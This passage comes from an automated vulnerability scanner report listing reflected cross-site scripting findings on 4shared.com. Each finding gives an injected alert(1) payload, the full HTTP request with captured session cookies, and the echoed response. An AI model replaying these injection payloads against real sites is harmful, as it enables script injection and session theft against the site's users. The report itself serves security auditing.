Date: Fri, 29 Jul 2011 13:57:37 GMT
Content-Length: 38845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/rest/account22f91"-alert(1)-"6aa4867a991/freeSpace";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.108. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7367"-alert(1)-"01af3631dea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rest/account/freeSpacea7367"-alert(1)-"01af3631dea?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account/freeSpacea7367"-alert(1)-"01af3631dea
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:49 GMT
Content-Length: 38847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/rest/account/freeSpacea7367"-alert(1)-"01af3631dea";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.109. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f142c'-alert(1)-'6f555e154b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rest/account/freeSpacef142c'-alert(1)-'6f555e154b4?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account/freeSpacef142c'-alert(1)-'6f555e154b4
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:51 GMT
Content-Length: 38670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/rest/account/freeSpacef142c'-alert(1)-'6f555e154b4',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.110. http://www.4shared.com/signup.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7998'-alert(1)-'1cd31803981 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /signup.jspa7998'-alert(1)-'1cd31803981 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /signup.jspa7998'-alert(1)-'1cd31803981
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:27 GMT
Content-Length: 38768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/signup.jspa7998'-alert(1)-'1cd31803981',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.111. http://www.4shared.com/signup.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be2b"-alert(1)-"5999fd25a14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /signup.jsp7be2b"-alert(1)-"5999fd25a14 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /signup.jsp7be2b"-alert(1)-"5999fd25a14
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:20 GMT
Content-Length: 38593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signup.jsp7be2b"-alert(1)-"5999fd25a14";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.112. http://www.4shared.com/sync/sync.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sync/sync.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83445'-alert(1)-'ce4aca1c713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sync83445'-alert(1)-'ce4aca1c713/sync.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync83445'-alert(1)-'ce4aca1c713/sync.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:28 GMT
Content-Length: 38612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/sync83445'-alert(1)-'ce4aca1c713/sync.css',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.113. http://www.4shared.com/sync/sync.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sync/sync.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36fee"-alert(1)-"c1e9c427056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sync36fee"-alert(1)-"c1e9c427056/sync.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync36fee"-alert(1)-"c1e9c427056/sync.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:25 GMT
Content-Length: 38781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/sync36fee"-alert(1)-"c1e9c427056/sync.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.114. http://www.4shared.com/sync/sync.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sync/sync.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3aa8'-alert(1)-'ea175ddf358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sync/sync.cssa3aa8'-alert(1)-'ea175ddf358?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync/sync.cssa3aa8'-alert(1)-'ea175ddf358
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:47 GMT
Content-Length: 38609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/sync/sync.cssa3aa8'-alert(1)-'ea175ddf358',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.115. http://www.4shared.com/sync/sync.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sync/sync.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e761"-alert(1)-"3c04ee6b149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sync/sync.css5e761"-alert(1)-"3c04ee6b149?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /sync/sync.css5e761"-alert(1)-"3c04ee6b149
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:44 GMT
Content-Length: 38782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/sync/sync.css5e761"-alert(1)-"3c04ee6b149";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.116. http://www.4shared.com/icons/16x16/doc.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 5cca2--><script>alert(1)</script>aa8a61c2b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5cca2--><script>alert(1)</script>aa8a61c2b44
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:25 GMT
Content-Length: 38751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>aa8a61c2b44-->
...[SNIP]...

2.117. http://www.4shared.com/icons/16x16/pdf.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 97791--><script>alert(1)</script>1f93d87de1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=97791--><script>alert(1)</script>1f93d87de1c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:11 GMT
Content-Length: 38575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>1f93d87de1c-->
...[SNIP]...

2.118. http://www.4shared.com/icons/16x16/png.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8dc37--><script>alert(1)</script>e7e0f649100 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /icons/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8dc37--><script>alert(1)</script>e7e0f649100
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:04 GMT
Content-Length: 38572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>e7e0f649100-->
...[SNIP]...

2.119. http://www.4shared.com/images/asf-logo.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8fbe7--><script>alert(1)</script>80d560929b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=8fbe7--><script>alert(1)</script>80d560929b8

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:20 GMT
Content-Length: 38567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>80d560929b8-->
...[SNIP]...

2.120. http://www.4shared.com/images/tomcat.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c37a1--><script>alert(1)</script>ca97132b045 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=c37a1--><script>alert(1)</script>ca97132b045

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:20 GMT
Content-Length: 38558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>ca97132b045-->
...[SNIP]...

2.121. http://www.4shared.com/images/void.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c6511--><script>alert(1)</script>fe3c2ad2eba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=c6511--><script>alert(1)</script>fe3c2ad2eba

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:26 GMT
Content-Length: 38726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>fe3c2ad2eba-->
...[SNIP]...

2.122. http://www.4shared.com/js/'%20+%20img%20+%20' [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b240e--><script>alert(1)</script>0c4c0f593d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

